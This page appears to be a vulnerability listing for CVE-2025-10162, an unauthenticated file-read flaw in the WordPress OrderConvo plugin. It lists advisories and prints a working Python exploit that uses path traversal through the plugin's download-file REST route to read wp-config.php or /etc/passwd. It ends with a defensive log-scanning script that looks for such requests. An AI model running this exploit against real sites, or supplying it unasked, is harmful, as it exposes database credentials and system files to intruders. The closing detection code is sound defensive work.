| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2025-10162 | 30 May 2026 22:15 | – | githubexploit |
| CVE-2025-10162 | 4 May 2026 03:43 | – | circl |
| WordPress plugin OrderConvo security vulnerability | 7 Oct 2025 00:00 | – | cnnvd |
| CVE-2025-10162 | 7 Oct 2025 06:00 | – | cve |
| CVE-2025-10162 OrderConvo < 14 - Unauthenticated Arbitrary File Read | 7 Oct 2025 06:00 | – | cvelist |
| WordPress OrderConvo 14 - Path Traversal | 1 Jun 2026 00:00 | – | exploitdb |
| EUVD-2025-32606 | 7 Oct 2025 06:00 | – | euvd |
| WordPress OrderConvo < 14 - Path Traversal | 3 Jun 2026 06:04 | – | nuclei |
| CVE-2025-10162 | 7 Oct 2025 06:15 | – | nvd |
| WordPress OrderConvo plugin < 14 - Unauthenticated Arbitrary File Read vulnerability | 7 Oct 2025 12:27 | – | patchstack |

```python
# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162
import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys


async def main(base_url, file):
    async with httpx.AsyncClient(verify=False) as client:
        try:
            print('[*] Checking connection to target')
            req = await client.get(url=base_url)
            if req.status_code == 200:
                print('[+] The target is alive, exploiting\n')
            else:
                print(f'[-] Unable to connect to the target. Code: {req.status_code}')
                sys.exit()
        except:
            print(f'[-] Problem with connection to the target.')
            sys.exit()
        exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
        r = await client.get(url=exp_url)
        if len(r.text) != 0:
            print(r.text)
        else:
            print("[*] Unable to read file")


parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")
parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")
args = parser.parse_args()
if __name__ == '__main__':
    asyncio.run(main(args.url, args.filename))
```
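
For defenders, the request shape in the PoC above (the `wooconvo/v1/download-file` route with a traversing `filename` parameter) is easy to hunt for in web server access logs. The following is an added example, not part of the original listing or the plugin's code: it assumes Apache/nginx "combined" log format, uses constructed sample lines, and goes slightly beyond the PoC by also matching WordPress's `?rest_route=` form of the same route and nested URL-encoding.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Route taken from the PoC above; WordPress also serves REST routes via ?rest_route=.
ROUTE = "/wooconvo/v1/download-file"
# Assumption: access logs are in Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jun/2026:10:00:00 +0000] "GET /wp-json/wooconvo/v1/download-file'
    '?order_id=1&filename=../../../../wp-config.php HTTP/1.1" 200 3121 "-" "-"',
    '192.0.2.10 - - [01/Jun/2026:10:01:00 +0000] "GET /wp-json/wooconvo/v1/download-file'
    '?order_id=12&filename=invoice.pdf HTTP/1.1" 200 48213 "-" "-"',
    '198.51.100.7 - - [01/Jun/2026:10:02:00 +0000] "GET /?rest_route=/wooconvo/v1/download-file'
    '&order_id=1&filename=%252e%252e%252fwp-config.php HTTP/1.1" 200 3121 "-" "-"',
    '192.0.2.44 - - [01/Jun/2026:10:03:00 +0000] "GET /wp-json/wp/v2/posts'
    '?filename=../x HTTP/1.1" 200 512 "-" "-"',
]

def is_traversal(value):
    """True if the value, once nested URL-encoding is undone, escapes its base directory."""
    for _ in range(3):  # unwrap double/triple encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return ".." in re.split(r"[\\/]+", value) or value.startswith(("/", "\\"))

def find_hits(lines):
    """Return (client_ip, status, filename) for each traversal attempt on the route."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query)  # decodes one layer of URL-encoding
        via_path = url.path.rstrip("/").endswith("/wp-json" + ROUTE)
        via_param = ROUTE in (r.rstrip("/") for r in query.get("rest_route", []))
        if via_path or via_param:
            hits += [(m["ip"], int(m["status"]), f)
                     for f in query.get("filename", []) if is_traversal(f)]
    return hits

if __name__ == "__main__":
    for ip, status, name in find_hits(SAMPLE_LOG):
        print(f"{ip} status={status} filename={name!r}")
```

A hit with status 200 and a non-trivial response size is the one to triage first; the advisories listed in the table above give versions below 14 as affected.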